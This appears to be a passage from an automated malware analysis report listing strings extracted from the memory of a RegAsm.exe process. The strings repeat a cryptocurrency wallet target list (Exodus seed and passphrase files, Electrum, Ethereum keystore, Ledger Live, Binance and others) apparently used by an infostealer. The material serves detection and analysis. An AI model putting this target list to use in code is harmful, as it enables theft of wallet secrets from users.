(Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json'[H`6
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
